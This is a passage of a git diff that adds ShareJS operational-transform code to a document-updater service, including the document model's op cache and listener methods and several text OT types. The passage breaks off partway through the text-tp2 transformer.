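+  // getOps('doc', 2, null, cb) yields everything from version 2 onwards.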
+ // + // Use getVersion() to determine if a document actually exists, if thats what you're + // after. + this.getOps = getOps = function (docName, start, end, callback) { + // getOps will only use the op cache if its there. It won't fill the op cache in. + if (!(start >= 0)) { + throw new Error('start must be 0+') + } + + if (typeof end === 'function') { + ;[end, callback] = Array.from([null, end]) + } + + const ops = docs[docName] != null ? docs[docName].ops : undefined + + if (ops) { + const version = docs[docName].v + + // Ops contains an array of ops. The last op in the list is the last op applied + if (end == null) { + end = version + } + start = Math.min(start, end) + + if (start === end) { + return callback(null, []) + } + + // Base is the version number of the oldest op we have cached + const base = version - ops.length + + // If the database is null, we'll trim to the ops we do have and hope thats enough. + if (start >= base || db === null) { + refreshReapingTimeout(docName) + if (options.stats != null) { + options.stats.cacheHit('getOps') + } + + return callback(null, ops.slice(start - base, end - base)) + } + } + + if (options.stats != null) { + options.stats.cacheMiss('getOps') + } + + return getOpsInternal(docName, start, end, callback) + } + + // Gets the snapshot data for the specified document. + // getSnapshot(docName, callback) + // Callback is called with (error, {v: <version>, type: <type>, snapshot: <snapshot>, meta: <meta>}) + this.getSnapshot = (docName, callback) => + load(docName, (error, doc) => + callback( + error, + doc + ? { v: doc.v, type: doc.type, snapshot: doc.snapshot, meta: doc.meta } + : undefined + ) + ) + + // Gets the latest version # of the document. + // getVersion(docName, callback) + // callback is called with (error, version). + this.getVersion = (docName, callback) => + load(docName, (error, doc) => + callback(error, doc != null ? doc.v : undefined) + ) + + // Apply an op to the specified document. + // The callback is passed (error, applied version #) + // opData = {op:op, v:v, meta:metadata} + // + // Ops are queued before being applied so that the following code applies op C before op B: + // model.applyOp 'doc', OPA, -> model.applyOp 'doc', OPB + // model.applyOp 'doc', OPC + this.applyOp = ( + docName, + opData, + callback // All the logic for this is in makeOpQueue, above. + ) => + load(docName, function (error, doc) { + if (error) { + return callback(error) + } + + return process.nextTick(() => + doc.opQueue(opData, function (error, newVersion) { + refreshReapingTimeout(docName) + return typeof callback === 'function' + ? callback(error, newVersion) + : undefined + }) + ) + }) + + // TODO: store (some) metadata in DB + // TODO: op and meta should be combineable in the op that gets sent + this.applyMetaOp = function (docName, metaOpData, callback) { + const { path, value } = metaOpData.meta + + if (!isArray(path)) { + return typeof callback === 'function' + ? callback('path should be an array') + : undefined + } + + return load(docName, function (error, doc) { + if (error != null) { + return typeof callback === 'function' ? callback(error) : undefined + } else { + let applied = false + switch (path[0]) { + case 'shout': + doc.eventEmitter.emit('op', metaOpData) + applied = true + break + } + + if (applied) { + model.emit('applyMetaOp', docName, path, value) + } + return typeof callback === 'function' + ? callback(null, doc.v) + : undefined + } + }) + } + + // Listen to all ops from the specified version. 
If version is in the past, all + // ops since that version are sent immediately to the listener. + // + // The callback is called once the listener is attached, but before any ops have been passed + // to the listener. + // + // This will _not_ edit the document metadata. + // + // If there are any listeners, we don't purge the document from the cache. But be aware, this behaviour + // might change in a future version. + // + // version is the document version at which the document is opened. It can be left out if you want to open + // the document at the most recent version. + // + // listener is called with (opData) each time an op is applied. + // + // callback(error, openedVersion) + this.listen = function (docName, version, listener, callback) { + if (typeof version === 'function') { + ;[version, listener, callback] = Array.from([null, version, listener]) + } + + return load(docName, function (error, doc) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + clearTimeout(doc.reapTimer) + + if (version != null) { + return getOps(docName, version, null, function (error, data) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + doc.eventEmitter.on('op', listener) + if (typeof callback === 'function') { + callback(null, version) + } + return (() => { + const result = [] + for (const op of Array.from(data)) { + let needle + listener(op) + + // The listener may well remove itself during the catchup phase. If this happens, break early. + // This is done in a quite inefficient way. (O(n) where n = #listeners on doc) + if ( + ((needle = listener), + !Array.from(doc.eventEmitter.listeners('op')).includes(needle)) + ) { + break + } else { + result.push(undefined) + } + } + return result + })() + }) + } else { + // Version is null / undefined. Just add the listener. + doc.eventEmitter.on('op', listener) + return typeof callback === 'function' + ? callback(null, doc.v) + : undefined + } + }) + } + + // Remove a listener for a particular document. + // + // removeListener(docName, listener) + // + // This is synchronous. + this.removeListener = function (docName, listener) { + // The document should already be loaded. + const doc = docs[docName] + if (!doc) { + throw new Error('removeListener called but document not loaded') + } + + doc.eventEmitter.removeListener('op', listener) + return refreshReapingTimeout(docName) + } + + // Flush saves all snapshot data to the database. I'm not sure whether or not this is actually needed - + // sharejs will happily replay uncommitted ops when documents are re-opened anyway. + this.flush = function (callback) { + if (!db) { + return typeof callback === 'function' ? callback() : undefined + } + + let pendingWrites = 0 + + for (const docName in docs) { + const doc = docs[docName] + if (doc.committedVersion < doc.v) { + pendingWrites++ + // I'm hoping writeSnapshot will always happen in another thread. + tryWriteSnapshot(docName, () => + process.nextTick(function () { + pendingWrites-- + if (pendingWrites === 0) { + return typeof callback === 'function' ? callback() : undefined + } + }) + ) + } + } + + // If nothing was queued, terminate immediately. + if (pendingWrites === 0) { + return typeof callback === 'function' ? callback() : undefined + } + } + + // Close the database connection. This is needed so nodejs can shut down cleanly. + this.closeDb = function () { + __guardMethod__(db, 'close', o => o.close()) + return (db = null) + } +} + +// Model inherits from EventEmitter. 
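+// Because of this, callers can subscribe to the lifecycle events emitted
+// above, for example (illustrative):
+//
+//   model.on('create', (docName, data) => console.log('created', docName))
+//   model.on('delete', docName => console.log('deleted', docName))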
+Model.prototype = new EventEmitter() + +function __guardMethod__(obj, methodName, transform) { + if ( + typeof obj !== 'undefined' && + obj !== null && + typeof obj[methodName] === 'function' + ) { + return transform(obj, methodName) + } else { + return undefined + } +} diff --git a/services/document-updater/app/js/sharejs/types/simple.js b/services/document-updater/app/js/sharejs/types/simple.js new file mode 100644 index 0000000..41f7eed --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/simple.js @@ -0,0 +1,54 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// This is a really simple OT type. Its not compiled with the web client, but it could be. +// +// Its mostly included for demonstration purposes and its used in a lot of unit tests. +// +// This defines a really simple text OT type which only allows inserts. (No deletes). +// +// Ops look like: +// {position:#, text:"asdf"} +// +// Document snapshots look like: +// {str:string} + +module.exports = { + // The name of the OT type. The type is stored in types[type.name]. The name can be + // used in place of the actual type in all the API methods. + name: 'simple', + + // Create a new document snapshot + create() { + return { str: '' } + }, + + // Apply the given op to the document snapshot. Returns the new snapshot. + // + // The original snapshot should not be modified. + apply(snapshot, op) { + if (!(op.position >= 0 && op.position <= snapshot.str.length)) { + throw new Error('Invalid position') + } + + let { str } = snapshot + str = str.slice(0, op.position) + op.text + str.slice(op.position) + return { str } + }, + + // transform op1 by op2. Return transformed version of op1. + // sym describes the symmetry of the op. Its 'left' or 'right' depending on whether the + // op being transformed comes from the client or the server. + transform(op1, op2, sym) { + let pos = op1.position + if (op2.position < pos || (op2.position === pos && sym === 'left')) { + pos += op2.text.length + } + + return { position: pos, text: op1.text } + }, +} diff --git a/services/document-updater/app/js/sharejs/types/syncqueue.js b/services/document-updater/app/js/sharejs/types/syncqueue.js new file mode 100644 index 0000000..7795923 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/syncqueue.js @@ -0,0 +1,60 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// A synchronous processing queue. The queue calls process on the arguments, +// ensuring that process() is only executing once at a time. +// +// process(data, callback) _MUST_ eventually call its callback. +// +// Example: +// +// queue = require 'syncqueue' +// +// fn = queue (data, callback) -> +// asyncthing data, -> +// callback(321) +// +// fn(1) +// fn(2) +// fn(3, (result) -> console.log(result)) +// +// ^--- async thing will only be running once at any time. 
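+//
+// The same example in plain JavaScript (an illustrative translation; the
+// `asyncthing` function is a placeholder for any async operation):
+//
+//   const queue = require('./syncqueue')
+//   const fn = queue((data, callback) => asyncthing(data, () => callback(321)))
+//   fn(1)
+//   fn(2)
+//   fn(3, result => console.log(result)) // logs 321 once 1 and 2 have finished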
+ +module.exports = function (process) { + if (typeof process !== 'function') { + throw new Error('process is not a function') + } + const queue = [] + + const enqueue = function (data, callback) { + queue.push([data, callback]) + return flush() + } + + enqueue.busy = false + + function flush() { + if (enqueue.busy || queue.length === 0) { + return + } + + enqueue.busy = true + const [data, callback] = Array.from(queue.shift()) + return process(data, function (...result) { + // TODO: Make this not use varargs - varargs are really slow. + enqueue.busy = false + // This is called after busy = false so a user can check if enqueue.busy is set in the callback. + if (callback) { + callback.apply(null, result) + } + return flush() + }) + } + + return enqueue +} diff --git a/services/document-updater/app/js/sharejs/types/text-api.js b/services/document-updater/app/js/sharejs/types/text-api.js new file mode 100644 index 0000000..aa2beef --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text-api.js @@ -0,0 +1,52 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// Text document API for text + +let text +if (typeof WEB === 'undefined') { + text = require('./text') +} + +text.api = { + provides: { text: true }, + + // The number of characters in the string + getLength() { + return this.snapshot.length + }, + + // Get the text contents of a document + getText() { + return this.snapshot + }, + + insert(pos, text, callback) { + const op = [{ p: pos, i: text }] + + this.submitOp(op, callback) + return op + }, + + del(pos, length, callback) { + const op = [{ p: pos, d: this.snapshot.slice(pos, pos + length) }] + + this.submitOp(op, callback) + return op + }, + + _register() { + return this.on('remoteop', function (op) { + return Array.from(op).map(component => + component.i !== undefined + ? this.emit('insert', component.p, component.i) + : this.emit('delete', component.p, component.d) + ) + }) + }, +} diff --git a/services/document-updater/app/js/sharejs/types/text-composable-api.js b/services/document-updater/app/js/sharejs/types/text-composable-api.js new file mode 100644 index 0000000..122e119 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text-composable-api.js @@ -0,0 +1,76 @@ +/* eslint-disable + no-undef, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// Text document API for text + +let type +if (typeof WEB !== 'undefined' && WEB !== null) { + type = exports.types['text-composable'] +} else { + type = require('./text-composable') +} + +type.api = { + provides: { text: true }, + + // The number of characters in the string + getLength() { + return this.snapshot.length + }, + + // Get the text contents of a document + getText() { + return this.snapshot + }, + + insert(pos, text, callback) { + const op = type.normalize([pos, { i: text }, this.snapshot.length - pos]) + + this.submitOp(op, callback) + return op + }, + + del(pos, length, callback) { + const op = type.normalize([ + pos, + { d: this.snapshot.slice(pos, pos + length) }, + this.snapshot.length - pos - length, + ]) + + this.submitOp(op, callback) + return op + }, + + _register() { + return this.on('remoteop', function (op) { + let pos = 0 + return (() => { + const result = [] + for (const component of Array.from(op)) { + if (typeof component === 'number') { + result.push((pos += component)) + } else if (component.i !== undefined) { + this.emit('insert', pos, component.i) + result.push((pos += component.i.length)) + } else { + // delete + result.push(this.emit('delete', pos, component.d)) + } + } + return result + })() + }) + }, +} +// We don't increment pos, because the position +// specified is after the delete has happened. diff --git a/services/document-updater/app/js/sharejs/types/text-composable.js b/services/document-updater/app/js/sharejs/types/text-composable.js new file mode 100644 index 0000000..199e695 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text-composable.js @@ -0,0 +1,400 @@ +/* eslint-disable + no-cond-assign, + no-return-assign, + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// An alternate composable implementation for text. This is much closer +// to the implementation used by google wave. +// +// Ops are lists of components which iterate over the whole document. +// Components are either: +// A number N: Skip N characters in the original document +// {i:'str'}: Insert 'str' at the current position in the document +// {d:'str'}: Delete 'str', which appears at the current position in the document +// +// Eg: [3, {i:'hi'}, 5, {d:'internet'}] +// +// Snapshots are strings. + +let makeAppend +const p = function () {} // require('util').debug +const i = function () {} // require('util').inspect + +const moduleExport = + typeof WEB !== 'undefined' && WEB !== null ? 
{} : module.exports + +moduleExport.name = 'text-composable' + +moduleExport.create = () => '' + +// -------- Utility methods + +const checkOp = function (op) { + if (!Array.isArray(op)) { + throw new Error('Op must be an array of components') + } + let last = null + return (() => { + const result = [] + for (const c of Array.from(op)) { + if (typeof c === 'object') { + if ( + (c.i == null || !(c.i.length > 0)) && + (c.d == null || !(c.d.length > 0)) + ) { + throw new Error(`Invalid op component: ${i(c)}`) + } + } else { + if (typeof c !== 'number') { + throw new Error('Op components must be objects or numbers') + } + if (!(c > 0)) { + throw new Error('Skip components must be a positive number') + } + if (typeof last === 'number') { + throw new Error('Adjacent skip components should be added') + } + } + + result.push((last = c)) + } + return result + })() +} + +// Makes a function for appending components to a given op. +// Exported for the randomOpGenerator. +moduleExport._makeAppend = makeAppend = op => + function (component) { + if (component === 0 || component.i === '' || component.d === '') { + return + } + if (op.length === 0) { + return op.push(component) + } else if ( + typeof component === 'number' && + typeof op[op.length - 1] === 'number' + ) { + return (op[op.length - 1] += component) + } else if (component.i != null && op[op.length - 1].i != null) { + return (op[op.length - 1].i += component.i) + } else if (component.d != null && op[op.length - 1].d != null) { + return (op[op.length - 1].d += component.d) + } else { + return op.push(component) + } + } + +// checkOp op + +// Makes 2 functions for taking components from the start of an op, and for peeking +// at the next op that could be taken. +const makeTake = function (op) { + // The index of the next component to take + let idx = 0 + // The offset into the component + let offset = 0 + + // Take up to length n from the front of op. If n is null, take the next + // op component. If indivisableField == 'd', delete components won't be separated. + // If indivisableField == 'i', insert components won't be separated. + const take = function (n, indivisableField) { + let c + if (idx === op.length) { + return null + } + // assert.notStrictEqual op.length, i, 'The op is too short to traverse the document' + + if (typeof op[idx] === 'number') { + if (n == null || op[idx] - offset <= n) { + c = op[idx] - offset + ++idx + offset = 0 + return c + } else { + offset += n + return n + } + } else { + // Take from the string + const field = op[idx].i ? 'i' : 'd' + c = {} + if ( + n == null || + op[idx][field].length - offset <= n || + field === indivisableField + ) { + c[field] = op[idx][field].slice(offset) + ++idx + offset = 0 + } else { + c[field] = op[idx][field].slice(offset, offset + n) + offset += n + } + return c + } + } + + const peekType = () => op[idx] + + return [take, peekType] +} + +// Find and return the length of an op component +const componentLength = function (component) { + if (typeof component === 'number') { + return component + } else if (component.i != null) { + return component.i.length + } else { + return component.d.length + } +} + +// Normalize an op, removing all empty skips and empty inserts / deletes. Concatenate +// adjacent inserts and deletes. +moduleExport.normalize = function (op) { + const newOp = [] + const append = makeAppend(newOp) + for (const component of Array.from(op)) { + append(component) + } + return newOp +} + +// Apply the op to the string. Returns the new string. 
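+// For example (illustrative): apply('abcde', [2, {i:'XY'}, 3]) returns
+// 'abXYcde', and apply('abXYcde', [3, {d:'Y'}, 3]) returns 'abXcde'. The
+// skips and deletes must traverse the whole input string, or apply throws.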
+moduleExport.apply = function (str, op) { + p(`Applying ${i(op)} to '${str}'`) + if (typeof str !== 'string') { + throw new Error('Snapshot should be a string') + } + checkOp(op) + + const pos = 0 + const newDoc = [] + + for (const component of Array.from(op)) { + if (typeof component === 'number') { + if (component > str.length) { + throw new Error('The op is too long for this document') + } + newDoc.push(str.slice(0, component)) + str = str.slice(component) + } else if (component.i != null) { + newDoc.push(component.i) + } else { + if (component.d !== str.slice(0, component.d.length)) { + throw new Error( + `The deleted text '${ + component.d + }' doesn't match the next characters in the document '${str.slice( + 0, + component.d.length + )}'` + ) + } + str = str.slice(component.d.length) + } + } + + if (str !== '') { + throw new Error("The applied op doesn't traverse the entire document") + } + + return newDoc.join('') +} + +// transform op1 by op2. Return transformed version of op1. +// op1 and op2 are unchanged by transform. +moduleExport.transform = function (op, otherOp, side) { + if (side !== 'left' && side !== 'right') { + throw new Error(`side (${side} must be 'left' or 'right'`) + } + + checkOp(op) + checkOp(otherOp) + const newOp = [] + + const append = makeAppend(newOp) + const [take, peek] = Array.from(makeTake(op)) + + for (component of Array.from(otherOp)) { + let chunk, length + if (typeof component === 'number') { + // Skip + length = component + while (length > 0) { + chunk = take(length, 'i') + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + append(chunk) + if (typeof chunk !== 'object' || chunk.i == null) { + length -= componentLength(chunk) + } + } + } else if (component.i != null) { + // Insert + if (side === 'left') { + // The left insert should go first. + const o = peek() + if (o != null ? o.i : undefined) { + append(take()) + } + } + + // Otherwise, skip the inserted text. + append(component.i.length) + } else { + // Delete. + // assert.ok component.d + ;({ length } = component.d) + while (length > 0) { + chunk = take(length, 'i') + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + if (typeof chunk === 'number') { + length -= chunk + } else if (chunk.i != null) { + append(chunk) + } else { + // assert.ok chunk.d + // The delete is unnecessary now. + length -= chunk.d.length + } + } + } + } + + // Append extras from op1 + while ((component = take())) { + if ((component != null ? component.i : undefined) == null) { + throw new Error(`Remaining fragments in the op: ${i(component)}`) + } + append(component) + } + + return newOp +} + +// Compose 2 ops into 1 op. 
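+// For example (illustrative): composing the two ops from the apply example
+// above collapses them into a single op,
+//
+//   compose([2, {i:'XY'}, 3], [3, {d:'Y'}, 3]) // => [2, {i:'X'}, 3]
+//
+// which takes 'abcde' straight to 'abXcde'.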
+moduleExport.compose = function (op1, op2) { + p(`COMPOSE ${i(op1)} + ${i(op2)}`) + checkOp(op1) + checkOp(op2) + + const result = [] + + const append = makeAppend(result) + const [take, _] = Array.from(makeTake(op1)) + + for (component of Array.from(op2)) { + let chunk, length + if (typeof component === 'number') { + // Skip + length = component + while (length > 0) { + chunk = take(length, 'd') + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + append(chunk) + if (typeof chunk !== 'object' || chunk.d == null) { + length -= componentLength(chunk) + } + } + } else if (component.i != null) { + // Insert + append({ i: component.i }) + } else { + // Delete + let offset = 0 + while (offset < component.d.length) { + chunk = take(component.d.length - offset, 'd') + if (chunk === null) { + throw new Error( + 'The op traverses more elements than the document has' + ) + } + + // If its delete, append it. If its skip, drop it and decrease length. If its insert, check the strings match, drop it and decrease length. + if (typeof chunk === 'number') { + append({ d: component.d.slice(offset, offset + chunk) }) + offset += chunk + } else if (chunk.i != null) { + if (component.d.slice(offset, offset + chunk.i.length) !== chunk.i) { + throw new Error("The deleted text doesn't match the inserted text") + } + offset += chunk.i.length + // The ops cancel each other out. + } else { + // Delete + append(chunk) + } + } + } + } + + // Append extras from op1 + while ((component = take())) { + if ((component != null ? component.d : undefined) == null) { + throw new Error(`Trailing stuff in op1 ${i(component)}`) + } + append(component) + } + + return result +} + +const invertComponent = function (c) { + if (typeof c === 'number') { + return c + } else if (c.i != null) { + return { d: c.i } + } else { + return { i: c.d } + } +} + +// Invert an op +moduleExport.invert = function (op) { + const result = [] + const append = makeAppend(result) + + for (const component of Array.from(op)) { + append(invertComponent(component)) + } + + return result +} + +if (typeof window !== 'undefined' && window !== null) { + if (!window.ot) { + window.ot = {} + } + if (!window.ot.types) { + window.ot.types = {} + } + window.ot.types.text = moduleExport +} diff --git a/services/document-updater/app/js/sharejs/types/text-tp2-api.js b/services/document-updater/app/js/sharejs/types/text-tp2-api.js new file mode 100644 index 0000000..1e1b40d --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text-tp2-api.js @@ -0,0 +1,133 @@ +/* eslint-disable + no-undef, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// Text document API for text-tp2 + +let type +if (typeof WEB !== 'undefined' && WEB !== null) { + type = exports.types['text-tp2'] +} else { + type = require('./text-tp2') +} + +const { _takeDoc: takeDoc, _append: append } = type + +const appendSkipChars = (op, doc, pos, maxlength) => + (() => { + const result = [] + while ( + (maxlength === undefined || maxlength > 0) && + pos.index < doc.data.length + ) { + const part = takeDoc(doc, pos, maxlength, true) + if (maxlength !== undefined && typeof part === 'string') { + maxlength -= part.length + } + result.push(append(op, part.length || part)) + } + return result + })() + +type.api = { + provides: { text: true }, + + // The number of characters in the string + getLength() { + return this.snapshot.charLength + }, + + // Flatten a document into a string + getText() { + const strings = Array.from(this.snapshot.data).filter( + elem => typeof elem === 'string' + ) + return strings.join('') + }, + + insert(pos, text, callback) { + if (pos === undefined) { + pos = 0 + } + + const op = [] + const docPos = { index: 0, offset: 0 } + + appendSkipChars(op, this.snapshot, docPos, pos) + append(op, { i: text }) + appendSkipChars(op, this.snapshot, docPos) + + this.submitOp(op, callback) + return op + }, + + del(pos, length, callback) { + const op = [] + const docPos = { index: 0, offset: 0 } + + appendSkipChars(op, this.snapshot, docPos, pos) + + while (length > 0) { + const part = takeDoc(this.snapshot, docPos, length, true) + if (typeof part === 'string') { + append(op, { d: part.length }) + length -= part.length + } else { + append(op, part) + } + } + + appendSkipChars(op, this.snapshot, docPos) + + this.submitOp(op, callback) + return op + }, + + _register() { + // Interpret recieved ops + generate more detailed events for them + return this.on('remoteop', function (op, snapshot) { + let textPos = 0 + const docPos = { index: 0, offset: 0 } + + for (const component of Array.from(op)) { + let part, remainder + if (typeof component === 'number') { + // Skip + remainder = component + while (remainder > 0) { + part = takeDoc(snapshot, docPos, remainder) + if (typeof part === 'string') { + textPos += part.length + } + remainder -= part.length || part + } + } else if (component.i !== undefined) { + // Insert + if (typeof component.i === 'string') { + this.emit('insert', textPos, component.i) + textPos += component.i.length + } + } else { + // Delete + remainder = component.d + while (remainder > 0) { + part = takeDoc(snapshot, docPos, remainder) + if (typeof part === 'string') { + this.emit('delete', textPos, part) + } + remainder -= part.length || part + } + } + } + }) + }, +} diff --git a/services/document-updater/app/js/sharejs/types/text-tp2.js b/services/document-updater/app/js/sharejs/types/text-tp2.js new file mode 100644 index 0000000..c3ff9ec --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/text-tp2.js @@ -0,0 +1,499 @@ +/* eslint-disable + no-cond-assign, + no-return-assign, + no-undef, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// A TP2 implementation of text, following this spec: +// http://code.google.com/p/lightwave/source/browse/trunk/experimental/ot/README +// +// A document is made up of a string and a set of tombstones inserted throughout +// the string. For example, 'some ', (2 tombstones), 'string'. +// +// This is encoded in a document as: {s:'some string', t:[5, -2, 6]} +// +// Ops are lists of components which iterate over the whole document. +// Components are either: +// N: Skip N characters in the original document +// {i:'str'}: Insert 'str' at the current position in the document +// {i:N}: Insert N tombstones at the current position in the document +// {d:N}: Delete (tombstone) N characters at the current position in the document +// +// Eg: [3, {i:'hi'}, 5, {d:8}] +// +// Snapshots are lists with characters and tombstones. Characters are stored in strings +// and adjacent tombstones are flattened into numbers. +// +// Eg, the document: 'Hello .....world' ('.' denotes tombstoned (deleted) characters) +// would be represented by a document snapshot of ['Hello ', 5, 'world'] + +let append, appendDoc, takeDoc +const type = { + name: 'text-tp2', + tp2: true, + create() { + return { charLength: 0, totalLength: 0, positionCache: [], data: [] } + }, + serialize(doc) { + if (!doc.data) { + throw new Error('invalid doc snapshot') + } + return doc.data + }, + deserialize(data) { + const doc = type.create() + doc.data = data + + for (const component of Array.from(data)) { + if (typeof component === 'string') { + doc.charLength += component.length + doc.totalLength += component.length + } else { + doc.totalLength += component + } + } + + return doc + }, +} + +const checkOp = function (op) { + if (!Array.isArray(op)) { + throw new Error('Op must be an array of components') + } + let last = null + return (() => { + const result = [] + for (const c of Array.from(op)) { + if (typeof c === 'object') { + if (c.i !== undefined) { + if ( + (typeof c.i !== 'string' || !(c.i.length > 0)) && + (typeof c.i !== 'number' || !(c.i > 0)) + ) { + throw new Error('Inserts must insert a string or a +ive number') + } + } else if (c.d !== undefined) { + if (typeof c.d !== 'number' || !(c.d > 0)) { + throw new Error('Deletes must be a +ive number') + } + } else { + throw new Error('Operation component must define .i or .d') + } + } else { + if (typeof c !== 'number') { + throw new Error('Op components must be objects or numbers') + } + if (!(c > 0)) { + throw new Error('Skip components must be a positive number') + } + if (typeof last === 'number') { + throw new Error('Adjacent skip components should be combined') + } + } + + result.push((last = c)) + } + return result + })() +} + +// Take the next part from the specified position in a document snapshot. +// position = {index, offset}. It will be updated. +type._takeDoc = takeDoc = function ( + doc, + position, + maxlength, + tombsIndivisible +) { + if (position.index >= doc.data.length) { + throw new Error('Operation goes past the end of the document') + } + + const part = doc.data[position.index] + // peel off data[0] + const result = + typeof part === 'string' + ? 
maxlength !== undefined + ? part.slice(position.offset, position.offset + maxlength) + : part.slice(position.offset) + : maxlength === undefined || tombsIndivisible + ? part - position.offset + : Math.min(maxlength, part - position.offset) + + const resultLen = result.length || result + + if ((part.length || part) - position.offset > resultLen) { + position.offset += resultLen + } else { + position.index++ + position.offset = 0 + } + + return result +} + +// Append a part to the end of a document +type._appendDoc = appendDoc = function (doc, p) { + if (p === 0 || p === '') { + return + } + + if (typeof p === 'string') { + doc.charLength += p.length + doc.totalLength += p.length + } else { + doc.totalLength += p + } + + const { data } = doc + if (data.length === 0) { + data.push(p) + } else if (typeof data[data.length - 1] === typeof p) { + data[data.length - 1] += p + } else { + data.push(p) + } +} + +// Apply the op to the document. The document is not modified in the process. +type.apply = function (doc, op) { + if ( + doc.totalLength === undefined || + doc.charLength === undefined || + doc.data.length === undefined + ) { + throw new Error('Snapshot is invalid') + } + + checkOp(op) + + const newDoc = type.create() + const position = { index: 0, offset: 0 } + + for (const component of Array.from(op)) { + let part, remainder + if (typeof component === 'number') { + remainder = component + while (remainder > 0) { + part = takeDoc(doc, position, remainder) + + appendDoc(newDoc, part) + remainder -= part.length || part + } + } else if (component.i !== undefined) { + appendDoc(newDoc, component.i) + } else if (component.d !== undefined) { + remainder = component.d + while (remainder > 0) { + part = takeDoc(doc, position, remainder) + remainder -= part.length || part + } + appendDoc(newDoc, component.d) + } + } + + return newDoc +} + +// Append an op component to the end of the specified op. +// Exported for the randomOpGenerator. +type._append = append = function (op, component) { + if ( + component === 0 || + component.i === '' || + component.i === 0 || + component.d === 0 + ) { + return + } + if (op.length === 0) { + return op.push(component) + } else { + const last = op[op.length - 1] + if (typeof component === 'number' && typeof last === 'number') { + return (op[op.length - 1] += component) + } else if ( + component.i !== undefined && + last.i != null && + typeof last.i === typeof component.i + ) { + return (last.i += component.i) + } else if (component.d !== undefined && last.d != null) { + return (last.d += component.d) + } else { + return op.push(component) + } + } +} + +// Makes 2 functions for taking components from the start of an op, and for peeking +// at the next op that could be taken. +const makeTake = function (op) { + // The index of the next component to take + let index = 0 + // The offset into the component + let offset = 0 + + // Take up to length maxlength from the op. If maxlength is not defined, there is no max. + // If insertsIndivisible is true, inserts (& insert tombstones) won't be separated. + // + // Returns null when op is fully consumed. 
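+  // Illustrative walk-through: with op = [5, {i:'abc'}, {d:2}], successive
+  // calls return
+  //   take(2) -> 2        (first part of the skip)
+  //   take()  -> 3        (rest of the skip)
+  //   take(2) -> {i:'ab'}
+  //   take()  -> {i:'c'}
+  //   take()  -> {d:2}
+  //   take()  -> null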
+ const take = function (maxlength, insertsIndivisible) { + let current + if (index === op.length) { + return null + } + + const e = op[index] + if ( + typeof (current = e) === 'number' || + typeof (current = e.i) === 'number' || + (current = e.d) !== undefined + ) { + let c + if ( + maxlength == null || + current - offset <= maxlength || + (insertsIndivisible && e.i !== undefined) + ) { + // Return the rest of the current element. + c = current - offset + ++index + offset = 0 + } else { + offset += maxlength + c = maxlength + } + if (e.i !== undefined) { + return { i: c } + } else if (e.d !== undefined) { + return { d: c } + } else { + return c + } + } else { + // Take from the inserted string + let result + if ( + maxlength == null || + e.i.length - offset <= maxlength || + insertsIndivisible + ) { + result = { i: e.i.slice(offset) } + ++index + offset = 0 + } else { + result = { i: e.i.slice(offset, offset + maxlength) } + offset += maxlength + } + return result + } + } + + const peekType = () => op[index] + + return [take, peekType] +} + +// Find and return the length of an op component +const componentLength = function (component) { + if (typeof component === 'number') { + return component + } else if (typeof component.i === 'string') { + return component.i.length + } else { + // This should work because c.d and c.i must be +ive. + return component.d || component.i + } +} + +// Normalize an op, removing all empty skips and empty inserts / deletes. Concatenate +// adjacent inserts and deletes. +type.normalize = function (op) { + const newOp = [] + for (const component of Array.from(op)) { + append(newOp, component) + } + return newOp +} + +// This is a helper method to transform and prune. goForwards is true for transform, false for prune. +const transformer = function (op, otherOp, goForwards, side) { + let component + checkOp(op) + checkOp(otherOp) + const newOp = [] + + const [take, peek] = 